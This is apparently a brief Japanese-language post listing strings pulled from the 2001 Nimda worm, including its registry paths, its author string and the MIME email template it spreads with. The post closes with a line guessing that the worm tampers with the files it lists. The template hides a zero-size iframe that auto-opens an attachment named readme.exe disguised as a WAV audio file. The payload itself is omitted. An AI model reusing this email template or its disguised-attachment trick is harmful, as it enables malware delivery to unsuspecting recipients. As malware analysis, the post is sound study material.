Nimda !!

System\CurrentControlSet\Services\VxD\MSTCP NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

（中略）

c: readme main index default html .asp .htm
\readme.eml .exe mep winzip32.exe
riched20.dll .nws .eml .doc .exe
（略）
\readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe
\riched20.dll boot Shell explorer.exe load.exe -dontrunold
\system.ini \load.exe \\ octet

後半部分のファイル名、拡張子を使ってるやつに色々細工するんだろうね。